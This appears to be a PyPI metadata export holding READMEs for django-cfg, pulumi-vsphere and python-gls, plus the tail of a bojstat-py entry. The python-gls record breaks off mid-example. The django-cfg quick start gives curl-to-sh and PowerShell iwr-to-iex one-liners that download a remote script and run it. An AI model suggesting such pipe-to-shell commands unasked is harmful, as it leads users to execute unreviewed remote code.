Every response carries a `meta` attribute exposing details about the API call.
```python
frame = client.data.get_by_code(db="CO", code="TK99F1000601GCQ01000")
print(frame.meta.status)         # 200
print(frame.meta.message_id)     # "M181000I"
print(frame.meta.message)        # "正常に終了しました。" (completed successfully)
print(frame.meta.date_parsed)    # datetime object
print(frame.meta.request_url)    # the URL that was called
print(frame.meta.next_position)  # next start position (None if complete)
print(frame.meta.resume_token)   # resume token
```
## Requirements
Python 3.12 or later.
| text/markdown | null | null | null | null | null | null | [] | [] | null | null | >=3.12 | [] | [] | [] | [
"httpx>=0.28.1",
"pyarrow>=18.0.0; extra == \"cli\"",
"rich>=13.0.0; extra == \"cli\"",
"typer>=0.16.0; extra == \"cli\"",
"pandas>=2.2.0; extra == \"dataframe\"",
"polars>=1.0.0; extra == \"dataframe\"",
"pandas>=2.2.0; extra == \"pandas\"",
"polars>=1.0.0; extra == \"polars\""
] | [] | [] | [] | [
"Repository, https://github.com/youseiushida/bojstat"
] | uv/0.9.18 {"installer":{"name":"uv","version":"0.9.18","subcommand":["publish"]},"python":null,"implementation":{"name":null,"version":null},"distro":{"name":"Ubuntu","version":"24.04","id":"noble","libc":null},"system":{"name":null,"release":null},"cpu":null,"openssl_version":null,"setuptools_version":null,"rustc_version":null,"ci":null} | 2026-02-20T06:55:46.736916 | bojstat_py-0.1.7.tar.gz | 89,057 | 52/88/36ec4344c3f0c739ebfd219f21f4e70cfd06a85ce447f56dbaa04af8aad0/bojstat_py-0.1.7.tar.gz | source | sdist | null | false | 8cfb1837de54675469144a8f4f89bb13 | c430375fc219bcf154544f7331c8f92bcfa343c25d537996a6339221f9643e94 | 528836ec4344c3f0c739ebfd219f21f4e70cfd06a85ce447f56dbaa04af8aad0 | null | [
"LICENSE"
] | 238 |
2.4 | django-cfg | 1.7.20 | Modern Django framework with type-safe Pydantic v2 configuration, Next.js admin integration, real-time WebSockets, and 8 enterprise apps. Replace settings.py with validated models, 90% less code. Production-ready with AI agents, auto-generated TypeScript clients, and zero-config features. | <div align="center">
<img src="https://raw.githubusercontent.com/markolofsen/django-cfg/refs/heads/main/static/logo.png" alt="Django-CFG Logo" width="200" />
# Django-CFG
[](https://pypi.org/project/django-cfg/)
[](https://www.python.org/)
[](https://www.djangoproject.com/)
[](LICENSE)
[](https://pypi.org/project/django-cfg/)
**The Modern Django Framework for Enterprise Applications**
Type-safe configuration • Next.js Admin • Real-time WebSockets • gRPC Streaming • AI-Native Docs • 8 Production Apps
[Get Started](https://djangocfg.com/docs/getting-started/intro) • [Live Demo](https://djangocfg.com/demo) • [Documentation](https://djangocfg.com/docs) • [MCP Server](https://djangocfg.com/mcp)
</div>
---
## What is Django-CFG?
**Django-CFG** is a next-generation Django framework that replaces `settings.py` with **type-safe Pydantic v2 models**. Catch configuration errors at startup, get full IDE autocomplete, and ship production-ready features in **30 seconds** instead of weeks.
### Why Django-CFG?
- ✅ **Type-safe config** - Pydantic v2 validation catches errors before deployment
- ✅ **90% less code** - Replace 200+ line settings.py with 30 lines
- ✅ **Built-in Next.js admin** - Modern React admin interface out of the box
- ✅ **Real-time WebSockets** - Centrifugo integration included
- ✅ **gRPC streaming** - Bidirectional streaming with WebSocket bridge
- ✅ **AI-native docs** - First Django framework with MCP server for AI assistants
- ✅ **8 enterprise apps** - Save 18+ months of development
---
## Quick Start
### One-Line Install
```bash
# macOS / Linux
curl -L https://djangocfg.com/install.sh | sh
# Windows (PowerShell)
powershell -c "iwr https://djangocfg.com/install.ps1 | iex"
```
### Manual Install
```bash
pip install 'django-cfg[full]'
django-cfg create-project my_app
cd my_app/projects/django
poetry run python manage.py runserver
```
**What you get instantly:**
- 🎨 Django Admin → `http://127.0.0.1:8000/admin/`
- ⚛️ Next.js Dashboard → Modern React interface
- 📡 Real-time WebSockets → Live updates
- 🐳 Docker Ready → Production configs
- 🖥️ Electron App → Desktop template
[→ Full Installation Guide](https://djangocfg.com/docs/getting-started/installation)
---
## Configuration Example
**Before: settings.py**
```python
# 200+ lines of untyped configuration
DEBUG = os.getenv('DEBUG', 'False') == 'True' # ❌ Bug waiting to happen
DATABASE_PORT = os.getenv('DB_PORT', '5432') # ❌ Still a string!
```
**After: Django-CFG**
```python
from django_cfg import DjangoConfig, DatabaseConfig
class MyConfig(DjangoConfig):
project_name: str = "My App"
debug: bool = False # ✅ Type-safe
databases: dict[str, DatabaseConfig] = {
"default": DatabaseConfig(
name="${DB_NAME}", # ✅ Validated at startup
port=5432, # ✅ Correct type
)
}
```
**Full IDE autocomplete** • **Startup validation** • **Zero runtime errors**
---
## Features
### 🔒 Type-Safe Configuration
Pydantic v2 models replace error-prone `settings.py` - catch bugs before deployment.
### ⚛️ Next.js Admin
Only Django framework with built-in Next.js integration - modern admin UI out of the box.
### 📡 Real-Time WebSockets
Production-ready Centrifugo integration - live updates, notifications, presence tracking.
### 🌐 gRPC Microservices
Bidirectional streaming with automatic WebSocket bridge - perfect for real-time architectures.
### 🤖 AI-Native Documentation
First Django framework with MCP server - AI assistants can access docs instantly.
### 📦 8 Enterprise Apps
User auth • Support tickets • Newsletter • CRM • AI agents • Knowledge base • Payments • Multi-site
**Time saved: 18+ months of development**
[→ See All Features](https://djangocfg.com/docs)
---
## What's Included
**Backend:**
- Django 5.2+ with type-safe config
- PostgreSQL, Redis, Centrifugo
- gRPC server with streaming
- 8 production-ready apps
- AI agent framework
- REST API with auto TypeScript generation
**Frontend:**
- Next.js 16 admin interface
- React 19 + TypeScript
- Tailwind CSS 4
- Real-time WebSocket client
- PWA support
**DevOps:**
- Docker Compose setup
- Traefik reverse proxy
- Production-ready configs
- Cloudflare integration
**AI Features:**
- MCP server for AI assistants
- Pydantic AI integration
- Vector DB (ChromaDB)
- RAG support
---
## Documentation
- **[Getting Started](https://djangocfg.com/docs/getting-started/intro)** - Quick setup guide
- **[Configuration](https://djangocfg.com/docs/getting-started/configuration)** - Type-safe config
- **[Next.js Admin](https://djangocfg.com/docs/features/integrations/nextjs-admin)** - Modern admin UI
- **[Real-Time](https://djangocfg.com/docs/features/integrations/centrifugo)** - WebSockets setup
- **[gRPC](https://djangocfg.com/docs/features/integrations/grpc)** - Microservices
- **[AI Agents](https://djangocfg.com/docs/ai-agents/introduction)** - Automation
- **[Built-in Apps](https://djangocfg.com/docs/features/built-in-apps/overview)** - 8 enterprise apps
---
## Community
- 🌐 **[djangocfg.com](https://djangocfg.com/)** - Official website
- 🎯 **[Live Demo](https://djangocfg.com/demo)** - See it in action
- 🐙 **[GitHub](https://github.com/markolofsen/django-cfg)** - Source code
- 💬 **[Discussions](https://github.com/markolofsen/django-cfg/discussions)** - Get help
- 📦 **[PyPI](https://pypi.org/project/django-cfg/)** - Package repository
---
## License
MIT License - Free for commercial use
---
<div align="center">
**Django-CFG** - Modern Django framework with type-safe configuration, AI-native docs, Next.js admin, gRPC streaming, real-time WebSockets, and 8 production-ready apps.
Made with ❤️ for the Django community
[Get Started](https://djangocfg.com/docs) • [Live Demo](https://djangocfg.com/demo) • [GitHub](https://github.com/markolofsen/django-cfg)
</div>
| text/markdown | null | Django-CFG Team <info@djangocfg.com> | null | Django-CFG Team <info@djangocfg.com> | MIT | ai-agents, centrifugo, configuration, django, django-environ, django-settings, enterprise-django, ide-autocomplete, modern-django, nextjs-admin, pydantic, pydantic-settings, react-admin, real-time, settings, startup-validation, type-safe-config, type-safety, typescript-generation, websocket | [
"Development Status :: 4 - Beta",
"Framework :: Django",
"Framework :: Django :: 5.2",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Topic :: Internet :: WWW/HTTP",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content",
"Topic :: Software Development :: Libraries :: Python Modules",
"Topic :: System :: Systems Administration",
"Typing :: Typed"
] | [] | null | null | <3.14,>=3.12 | [] | [] | [] | [
"adrf<0.2.0,>=0.1.11",
"beautifulsoup4<5.0,>=4.13.0",
"cachetools<7.0,>=5.3.0",
"click<9.0,>=8.2.0",
"cloudflare<5.0,>=4.3.0",
"colorlog<7.0,>=6.9.0",
"coolname<3.0,>=2.2.0",
"cryptography>=44.0.0",
"dj-database-url<4.0,>=3.0.0",
"django-admin-rangefilter<1.0,>=0.13.0",
"django-axes[ipware]<9.0.0,>=8.0.0",
"django-constance<5.0,>=4.3.0",
"django-cors-headers<5.0,>=4.7.0",
"django-extensions<5.0,>=4.1.0",
"django-filter<26.0,>=25.0",
"django-import-export<5.0,>=4.3.0",
"django-json-widget<3.0,>=2.0.0",
"django-ratelimit<5.0.0,>=4.1.0",
"django-redis<7.0,>=6.0.0",
"django-tailwind[reload]<5.0.0,>=4.2.0",
"django-unfold>=0.73.1",
"djangorestframework-simplejwt<6.0,>=5.5.0",
"djangorestframework<4.0,>=3.16.0",
"drf-nested-routers<1.0,>=0.94.0",
"drf-spectacular-sidecar<2026.0,>=2025.8.0",
"drf-spectacular<1.0,>=0.28.0",
"extra-streamlit-components<1.0,>=0.1.81",
"geopy<3.0,>=2.4.0",
"hiredis<4.0,>=2.0.0",
"httpx<1.0,>=0.28.1",
"jinja2<4.0.0,>=3.1.6",
"loguru<1.0,>=0.7.0",
"lxml<7.0,>=6.0.0",
"mistune<4.0,>=3.1.4",
"mypy<2.0.0,>=1.18.2",
"ngrok>=1.5.1; python_version >= \"3.12\"",
"openai<3.0,>=1.107.0",
"pandas<3.0,>=2.0.0",
"pgvector<1.0,>=0.4.0",
"plotly<7.0,>=6.0.0",
"psutil>=7.0.0",
"psycopg[binary,pool]<4.0,>=3.2.0",
"pydantic-settings<3.0.0,>=2.11.0",
"pydantic<3.0,>=2.11.0",
"pydantic[email]<3.0,>=2.11.0",
"pygments<3.0,>=2.19.0",
"pyjwt<3.0,>=2.8.0",
"pyotp<3.0,>=2.9.0",
"pytelegrambotapi<5.0,>=4.28.0",
"python-json-logger<4.0,>=3.3.0",
"pywebpush<3.0,>=2.0.0",
"pyyaml<7.0,>=6.0",
"qrcode<9.0,>=8.2",
"questionary<3.0,>=2.1.0",
"redis<7.0,>=6.4.0",
"requests<3.0,>=2.32.0",
"rich<15.0,>=14.0.0",
"setuptools>=75.0.0; python_version >= \"3.13\"",
"streamlit-aggrid<2.0,>=1.2.1",
"streamlit-antd-components<1.0,>=0.3.0",
"streamlit-authenticator<1.0,>=0.4.1",
"streamlit-autorefresh<2.0,>=1.0.1",
"streamlit-cookies-controller<1.0,>=0.0.4",
"streamlit-extras<1.0,>=0.7.8",
"streamlit-folium<1.0,>=0.26.1",
"streamlit-keyup<1.0,>=0.3.0",
"streamlit-local-storage<1.0,>=0.0.25",
"streamlit-option-menu<1.0,>=0.4.0",
"streamlit-pydantic<1.0,>=0.6.0",
"streamlit-shadcn-ui<1.0,>=0.1.19",
"streamlit<2.0,>=1.54.0",
"tenacity<10.0.0,>=9.1.2",
"tiktoken<1.0,>=0.11.0",
"toml<0.11.0,>=0.10.2",
"tzlocal<6.0,>=5.3.1",
"whitenoise<7.0,>=6.8.0",
"pydantic-ai<2.0,>=1.34.0; extra == \"ai\"",
"cent<6.0,>=5.0.0; extra == \"centrifugo\"",
"websockets<15.0,>=13.0; extra == \"centrifugo\"",
"betterproto2-compiler<1.0,>=0.9.0; extra == \"dev\"",
"black>=23.0; extra == \"dev\"",
"build>=1.0; extra == \"dev\"",
"django<6.0,>=5.2; extra == \"dev\"",
"factory-boy>=3.0; extra == \"dev\"",
"fakeredis>=2.0; extra == \"dev\"",
"flake8>=5.0; extra == \"dev\"",
"isort>=5.0; extra == \"dev\"",
"mkdocs-material>=9.0; extra == \"dev\"",
"mkdocs>=1.5; extra == \"dev\"",
"mkdocstrings[python]>=0.24; extra == \"dev\"",
"mypy>=1.0; extra == \"dev\"",
"pre-commit>=3.0; extra == \"dev\"",
"pytest-cov>=4.0; extra == \"dev\"",
"pytest-django>=4.5; extra == \"dev\"",
"pytest-mock>=3.0; extra == \"dev\"",
"pytest>=7.0; extra == \"dev\"",
"questionary>=2.0; extra == \"dev\"",
"redis>=5.0; extra == \"dev\"",
"rich>=13.0; extra == \"dev\"",
"tomlkit>=0.11; extra == \"dev\"",
"twine>=4.0; extra == \"dev\"",
"django<6.0,>=5.2; extra == \"django52\"",
"mkdocs-material>=9.0; extra == \"docs\"",
"mkdocs>=1.5; extra == \"docs\"",
"mkdocstrings[python]>=0.24; extra == \"docs\"",
"pymdown-extensions>=10.0; extra == \"docs\"",
"aiobreaker<2.0,>=1.2.0; extra == \"full\"",
"betterproto2[all]<1.0,>=0.9.0; extra == \"full\"",
"black>=23.0; extra == \"full\"",
"build>=1.0; extra == \"full\"",
"cent<6.0,>=5.0.0; extra == \"full\"",
"django-rq>=3.0; extra == \"full\"",
"django<6.0,>=5.2; extra == \"full\"",
"factory-boy>=3.0; extra == \"full\"",
"flake8>=5.0; extra == \"full\"",
"grpcio-health-checking<2.0,>=1.50.0; extra == \"full\"",
"grpcio-reflection<2.0,>=1.50.0; extra == \"full\"",
"grpcio-tools<2.0,>=1.50.0; extra == \"full\"",
"grpcio<2.0,>=1.50.0; extra == \"full\"",
"grpclib<1.0,>=0.4.8; extra == \"full\"",
"hiredis>=2.0; extra == \"full\"",
"isort>=5.0; extra == \"full\"",
"mkdocs-material>=9.0; extra == \"full\"",
"mkdocs>=1.5; extra == \"full\"",
"mkdocstrings[python]>=0.24; extra == \"full\"",
"mypy>=1.0; extra == \"full\"",
"pre-commit>=3.0; extra == \"full\"",
"protobuf<7.0,>=5.0; extra == \"full\"",
"pydantic-ai<2.0,>=1.34.0; extra == \"full\"",
"pymdown-extensions>=10.0; extra == \"full\"",
"pytest-cov>=4.0; extra == \"full\"",
"pytest-django>=4.5; extra == \"full\"",
"pytest-mock>=3.0; extra == \"full\"",
"pytest-xdist>=3.0; extra == \"full\"",
"pytest>=7.0; extra == \"full\"",
"questionary>=2.0; extra == \"full\"",
"redis>=5.0; extra == \"full\"",
"rich>=13.0; extra == \"full\"",
"rq-scheduler>=0.13; extra == \"full\"",
"rq>=1.0; extra == \"full\"",
"stamina<26.0,>=25.2.0; extra == \"full\"",
"structlog<26.0,>=24.0.0; extra == \"full\"",
"tomlkit>=0.11; extra == \"full\"",
"twine>=4.0; extra == \"full\"",
"websockets<15.0,>=13.0; extra == \"full\"",
"aiobreaker<2.0,>=1.2.0; extra == \"grpc\"",
"betterproto2[all]<1.0,>=0.9.0; extra == \"grpc\"",
"grpcio-health-checking<2.0,>=1.50.0; extra == \"grpc\"",
"grpcio-reflection<2.0,>=1.50.0; extra == \"grpc\"",
"grpcio-tools<2.0,>=1.50.0; extra == \"grpc\"",
"grpcio<2.0,>=1.50.0; extra == \"grpc\"",
"grpclib<1.0,>=0.4.8; extra == \"grpc\"",
"protobuf<7.0,>=5.0; extra == \"grpc\"",
"stamina<26.0,>=25.2.0; extra == \"grpc\"",
"structlog<26.0,>=24.0.0; extra == \"grpc\"",
"django-rq>=3.0; extra == \"rq\"",
"hiredis>=2.0; extra == \"rq\"",
"redis>=5.0; extra == \"rq\"",
"rq-scheduler>=0.13; extra == \"rq\"",
"rq>=1.0; extra == \"rq\"",
"redis>=5.0; extra == \"tasks\"",
"django<6.0,>=5.2; extra == \"test\"",
"factory-boy>=3.0; extra == \"test\"",
"fakeredis>=2.0; extra == \"test\"",
"pytest-cov>=4.0; extra == \"test\"",
"pytest-django>=4.5; extra == \"test\"",
"pytest-mock>=3.0; extra == \"test\"",
"pytest-xdist>=3.0; extra == \"test\"",
"pytest>=7.0; extra == \"test\""
] | [] | [] | [] | [
"Homepage, https://djangocfg.com",
"Documentation, https://djangocfg.com",
"Repository, https://github.com/markolofsen/django-cfg",
"Issues, https://github.com/markolofsen/django-cfg/issues",
"Changelog, https://github.com/markolofsen/django-cfg/blob/main/CHANGELOG.md"
] | twine/6.2.0 CPython/3.12.8 | 2026-02-20T06:55:11.828624 | django_cfg-1.7.20.tar.gz | 26,314,752 | bf/0d/340a9d161f928d34115462ee40c12deff57a4f70ef7fca802b66b4627546/django_cfg-1.7.20.tar.gz | source | sdist | null | false | 79b9f35551a3ac8d83a07866cb2119e3 | f827b9cca9959938c7823baaabe71b2d73b7da1bfda965863560f5f506a1d8bf | bf0d340a9d161f928d34115462ee40c12deff57a4f70ef7fca802b66b4627546 | null | [
"LICENSE"
] | 269 |
2.4 | pulumi-vsphere | 4.17.0a1771570077 | A Pulumi package for creating vsphere resources | [](https://github.com/pulumi/pulumi-vsphere/actions)
[](https://slack.pulumi.com)
[](https://www.npmjs.com/package/@pulumi/vsphere)
[](https://pypi.org/project/pulumi-vsphere)
[](https://badge.fury.io/nu/pulumi.vsphere)
[](https://pkg.go.dev/github.com/pulumi/pulumi-vsphere/sdk/v3/go)
[](https://github.com/pulumi/pulumi-vsphere/blob/master/LICENSE)
# VSphere provider
The VSphere resource provider for Pulumi lets you use VSphere resources in your infrastructure
programs. To use this package, please [install the Pulumi CLI first](https://pulumi.io/).
## Installing
This package is available in many languages in the standard packaging formats.
### Node.js (JavaScript/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
$ npm install @pulumi/vsphere
or `yarn`:
$ yarn add @pulumi/vsphere
### Python
To use from Python, install using `pip`:
$ pip install pulumi-vsphere
### Go
To use from Go, use `go get` to grab the latest version of the library
$ go get github.com/pulumi/pulumi-vsphere/sdk/v3/
### .NET
To use from .NET, install using `dotnet add package`:
$ dotnet add package Pulumi.Vsphere
## Configuration
The following configuration points are available:
- `vsphere:user` - (Required) This is the username for vSphere API operations. Can also be specified with the `VSPHERE_USER`
environment variable.
- `vsphere:password` - (Required) This is the password for vSphere API operations. Can also be specified with the
`VSPHERE_PASSWORD` environment variable.
- `vsphere:vsphereServer` - (Required) This is the vCenter server name for vSphere API operations. Can also be specified
with the `VSPHERE_SERVER` environment variable.
- `vsphere:allowUnverifiedSsl` - (Optional) Boolean that can be set to true to disable SSL certificate verification.
This should be used with care as it could allow an attacker to intercept your auth token. If omitted, default value is
`false`. Can also be specified with the `VSPHERE_ALLOW_UNVERIFIED_SSL` environment variable.
- `vsphere:vimKeepAlive` - (Optional) Keep alive interval in minutes for the VIM session. Standard session timeout in
vSphere is 30 minutes. This defaults to `10` minutes to ensure that operations that take longer than 30 minutes
without API interaction do not result in a session timeout. Can also be specified with the `VSPHERE_VIM_KEEP_ALIVE`
environment variable.
- `vsphere:persistSession` - (Optional) Persist the SOAP and REST client sessions to disk. Default: false. Can also be
specified by the `VSPHERE_PERSIST_SESSION` environment variable.
- `vsphere:vimSessionPath` - (Optional) The directory to save the VIM SOAP API session to. Default: `${HOME}/.govmomi/sessions`.
Can also be specified by the `VSPHERE_VIM_SESSION_PATH` environment variable.
- `vsphere:restSessionPath` - (Optional) The directory to save the REST API session (used for tags) to. Default: `${HOME}/.govmomi/rest_sessions`.
Can also be specified by the `VSPHERE_REST_SESSION_PATH` environment variable.
- `vsphere:clientDebug` - (Optional) When `true`, the provider logs SOAP calls made to the vSphere API to disk. The log
files are logged to `${HOME}/.govmomi`. Can also be specified with the `VSPHERE_CLIENT_DEBUG` environment variable.
- `vsphere:clientDebugPath` - (Optional) Override the default log path. Can also be specified with the
`VSPHERE_CLIENT_DEBUG_PATH` environment variable.
- `vsphere:clientDebugPathRun` - (Optional) A specific subdirectory in `client_debug_path` to use for debugging calls for
this particular provider configuration. All data in this directory is removed at the start of the provider run. Can also
be specified with the `VSPHERE_CLIENT_DEBUG_PATH_RUN` environment variable.
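As with any Pulumi provider, these settings can be placed in a stack's configuration with the Pulumi CLI. A sketch with placeholder values (substitute your own vCenter details; `--secret` stores the value encrypted):

```shell
# Placeholder values -- replace with your own vCenter details
pulumi config set vsphere:user administrator@vsphere.local
pulumi config set --secret vsphere:password   # prompts for the value
pulumi config set vsphere:vsphereServer vcenter.example.com

# Optional: only for lab environments with self-signed certificates
pulumi config set vsphere:allowUnverifiedSsl true
```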
## Reference
For further information, please visit [the vSphere provider docs](https://www.pulumi.com/docs/intro/cloud-providers/vsphere) or for detailed reference documentation, please visit [the API docs](https://www.pulumi.com/docs/reference/pkg/vsphere).
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, vsphere | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://pulumi.io",
"Repository, https://github.com/pulumi/pulumi-vsphere"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:54:29.250515 | pulumi_vsphere-4.17.0a1771570077.tar.gz | 319,950 | 32/d8/4ecab1651ccc9f37e79e978b88ce911a8e72ecfeabe46d3de144c0a3564f/pulumi_vsphere-4.17.0a1771570077.tar.gz | source | sdist | null | false | ff10ce189d5b3bc5c8ab51142be19708 | c9acc7bbd6dc3b77863e124550dce2951a9be9da78c1c74906803b4dcf540953 | 32d84ecab1651ccc9f37e79e978b88ce911a8e72ecfeabe46d3de144c0a3564f | null | [] | 213 |
2.4 | python-gls | 0.2.0 | GLS estimator with learned correlation and variance structures (Python equivalent of R's nlme::gls) | # python-gls
**GLS with learned correlation and variance structures for Python.**
The missing Python equivalent of R's `nlme::gls()`. Unlike `statsmodels.GLS` (which requires you to supply a pre-computed covariance matrix), `python-gls` *estimates* the correlation and variance structure from your data via maximum likelihood (ML) or restricted maximum likelihood (REML) — exactly like R's `nlme::gls()`.
## Why this library?
If you work with **panel data**, **repeated measures**, **longitudinal studies**, or **clustered observations**, your errors are probably correlated and possibly heteroscedastic. Ignoring this gives you wrong standard errors and misleading p-values.
R has had `nlme::gls()` for 25+ years. Python hasn't had an equivalent. Until now.
| Feature | `statsmodels.GLS` | `python-gls` | R `nlme::gls` |
|---|---|---|---|
| Estimate correlation from data | No (manual Omega) | Yes | Yes |
| AR(1), compound symmetry, etc. | No | Yes (11 structures) | Yes |
| Heteroscedastic variance models | No | Yes (6 functions) | Yes |
| ML / REML estimation | No | Yes | Yes |
| R-style formulas | No | Yes | Yes |
## Installation
```bash
pip install python-gls
```
Or from source:
```bash
git clone https://github.com/brunoabrahao/python-gls.git
cd python-gls
pip install -e ".[dev]"
```
## Quick Start
```python
from python_gls import GLS
from python_gls.correlation import CorAR1
from python_gls.variance import VarIdent
result = GLS.from_formula(
"response ~ treatment + time",
data=df,
correlation=CorAR1(), # Learn AR(1) correlation
variance=VarIdent("group"), # Learn group-specific variances
groups="subject", # Define independent clusters
).fit()
print(result.summary())
print(f"Estimated AR(1) phi: {result.correlation_params[0]:.3f}")
```
Output:
```
==============================================================================
Generalized Least Squares Results
==============================================================================
Method: REML Log-Likelihood: -615.0544
No. Observations:500 AIC: 1240.1088
Df Model: 2 BIC: 1261.1818
Df Residuals: 497 Sigma^2: 0.984576
Converged: Yes Iterations: 6
------------------------------------------------------------------------------
coef std err t P>|t| [0.025 0.975]
------------------------------------------------------------------------------
Intercept 1.0368 0.1069 9.7013 0.0000 0.8268 1.2468
treatment 0.6465 0.1428 4.5272 0.0000 0.3659 0.9271
x 1.9734 0.0323 61.0960 0.0000 1.9099 2.0368
==============================================================================
Correlation Structure: CorAR1
Parameters: [0.61312872]
```
## Correlation Structures
All correlation structures are in `python_gls.correlation`.
### Temporal / Serial Correlation
| Class | R Equivalent | Parameters | Description |
|---|---|---|---|
| `CorAR1(phi=None)` | `corAR1()` | 1 | First-order autoregressive. R[i,j] = phi^\|i-j\| |
| `CorARMA(p, q)` | `corARMA(p, q)` | p + q | ARMA(p,q) autocorrelation |
| `CorCAR1(phi=None)` | `corCAR1()` | 1 | Continuous-time AR(1) for irregular spacing |
| `CorCompSymm(rho=None)` | `corCompSymm()` | 1 | Exchangeable / compound symmetry. All pairs equal rho |
| `CorSymm(dim=None)` | `corSymm()` | d(d-1)/2 | General unstructured. Free correlation for every pair |
### Spatial Correlation
| Class | R Equivalent | Parameters | Description |
|---|---|---|---|
| `CorExp(range_param, nugget=False)` | `corExp()` | 1-2 | Exponential: exp(-d/range) |
| `CorGaus(range_param, nugget=False)` | `corGaus()` | 1-2 | Gaussian: exp(-(d/range)^2) |
| `CorLin(range_param, nugget=False)` | `corLin()` | 1-2 | Linear: max(1 - d/range, 0) |
| `CorRatio(range_param, nugget=False)` | `corRatio()` | 1-2 | Rational quadratic: 1/(1 + (d/range)^2) |
| `CorSpher(range_param, nugget=False)` | `corSpher()` | 1-2 | Spherical: cubic polynomial, zero beyond range |
All spatial structures accept an optional `nugget=True` parameter for a discontinuity at distance zero.
### Usage
```python
from python_gls.correlation import CorAR1, CorSymm, CorExp
# Serial: AR(1) with optional initial value
cor = CorAR1(phi=0.5)
# Unstructured: all pairs free
cor = CorSymm() # dimension inferred from data
# Spatial: set coordinates per group
cor = CorExp(range_param=10.0, nugget=True)
cor.set_coordinates(group_id=0, coords=np.array([[0,0], [1,0], [0,1]]))
```
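As a concrete reference for the serial structures above, here is a small NumPy sketch (independent of this package) of the AR(1) and compound-symmetry correlation matrices for a group of size `m`:

```python
import numpy as np

def ar1_corr(phi: float, m: int) -> np.ndarray:
    """AR(1): R[i, j] = phi ** |i - j|."""
    idx = np.arange(m)
    return phi ** np.abs(np.subtract.outer(idx, idx))

def compsymm_corr(rho: float, m: int) -> np.ndarray:
    """Compound symmetry: ones on the diagonal, rho everywhere else."""
    return np.full((m, m), rho) + (1.0 - rho) * np.eye(m)

# First row of the AR(1) matrix decays geometrically: 1, 0.5, 0.25, 0.125
R = ar1_corr(0.5, 4)
```

These are the matrices that `CorAR1` and `CorCompSymm` parametrize; the package estimates `phi`/`rho` from the data by ML or REML rather than taking them as fixed.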
## Variance Functions
All variance functions are in `python_gls.variance`.
| Class | R Equivalent | Parameters | Description |
|---|---|---|---|
| `VarIdent(group_var)` | `varIdent(form=~1\|group)` | G-1 | Different variance per group level |
| `VarPower(covariate)` | `varPower(form=~cov)` | 1 | sd = \|v\|^delta |
| `VarExp(covariate)` | `varExp(form=~cov)` | 1 | sd = exp(delta * v) |
| `VarConstPower(covariate)` | `varConstPower(form=~cov)` | 2 | sd = (c + \|v\|^delta) |
| `VarFixed(weights_var)` | `varFixed(~cov)` | 0 | Pre-specified weights (not estimated) |
| `VarComb(*varfuncs)` | `varComb(...)` | sum | Product of multiple variance functions |
### Usage
```python
from python_gls.variance import VarIdent, VarPower, VarComb
# Different variance for treatment vs. control
var = VarIdent("treatment_group")
# Variance increases with fitted values
var = VarPower("fitted_values")
# Combine: group-specific + covariate-dependent
var = VarComb(VarIdent("group"), VarPower("x"))
```
## API Reference
### `GLS` Class
#### Construction
```python
# From formula (recommended)
model = GLS.from_formula(
formula, # R-style formula: "y ~ x1 + x2"
data, # pandas DataFrame
correlation=None, # CorStruct instance
variance=None, # VarFunc instance
groups=None, # str: column name for groups
method="REML", # "ML" or "REML"
)
# From arrays
model = GLS(
endog=y, # response vector
exog=X, # design matrix (include intercept column)
correlation=None,
variance=None,
groups=None, # array of group labels
method="REML",
)
```
#### Fitting
```python
result = model.fit(
maxiter=200, # max optimization iterations
tol=1e-8, # convergence tolerance
verbose=False, # print optimization progress
n_jobs=1, # parallel threads (-1 for all cores)
)
```
### `GLSResults` Class
| Property / Method | Type | Description |
|---|---|---|
| `params` | Series | Estimated coefficients |
| `bse` | Series | Standard errors |
| `tvalues` | Series | t-statistics |
| `pvalues` | Series | Two-sided p-values |
| `conf_int(alpha=0.05)` | DataFrame | Confidence intervals |
| `sigma2` | float | Estimated residual variance |
| `loglik` | float | Log-likelihood at convergence |
| `aic` | float | Akaike Information Criterion |
| `bic` | float | Bayesian Information Criterion |
| `resid` | array | Residuals (y - X*beta) |
| `fittedvalues` | array | Fitted values (X*beta) |
| `correlation_params` | array | Estimated correlation parameters |
| `variance_params` | array | Estimated variance parameters |
| `cov_params_func()` | DataFrame | Covariance matrix of beta |
| `summary()` | str | Formatted results table |
| `converged` | bool | Optimization convergence status |
| `n_iter` | int | Number of iterations |
| `method` | str | "ML" or "REML" |
## How It Works
### The Statistical Model
GLS models the response as:
**y = X*beta + epsilon**, where **Var(epsilon) = sigma^2 * Omega**
The covariance matrix Omega is block-diagonal by group:
**Omega_g = A_g^{1/2} R_g A_g^{1/2}**
where:
- **R_g** is the correlation matrix (from the correlation structure)
- **A_g** is a diagonal matrix of variance weights (from the variance function)
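To make the assembly concrete, here is a small NumPy sketch (illustrative only, not the package's internal code) building one group's Omega_g from a compound-symmetry R_g and a diagonal of variance weights:

```python
import numpy as np

m, rho = 3, 0.4
R = np.full((m, m), rho) + (1.0 - rho) * np.eye(m)   # R_g: compound symmetry
a = np.array([1.0, 2.0, 4.0])                        # per-observation variance weights
A_half = np.diag(np.sqrt(a))                         # A_g^{1/2}
Omega = A_half @ R @ A_half                          # Omega_g = A^{1/2} R A^{1/2}

# Diagonal recovers the weights; off-diagonals scale by rho * sqrt(a_i * a_j)
assert np.allclose(np.diag(Omega), a)
```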
### Estimation
1. **OLS initial fit** to get starting residuals
2. **Initialize** correlation and variance parameters from residuals
3. **Optimize** profile log-likelihood over correlation/variance parameters using L-BFGS-B. At each step, beta and sigma^2 are profiled out analytically.
4. **Compute** final GLS estimates at the converged parameters:
- beta = (X' Omega^{-1} X)^{-1} X' Omega^{-1} y
- Cov(beta) = sigma^2 (X' Omega^{-1} X)^{-1}
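With the correlation and variance parameters fixed, step 4 reduces to a few linear solves. A minimal dense NumPy sketch for illustration (the package itself works block-by-block per group):

```python
import numpy as np

rng = np.random.default_rng(0)
n = 50
X = np.column_stack([np.ones(n), rng.normal(size=n)])  # intercept + one covariate
beta_true = np.array([1.0, 2.0])

# Equicorrelated errors: Omega = (1 - rho) * I + rho * J
rho = 0.3
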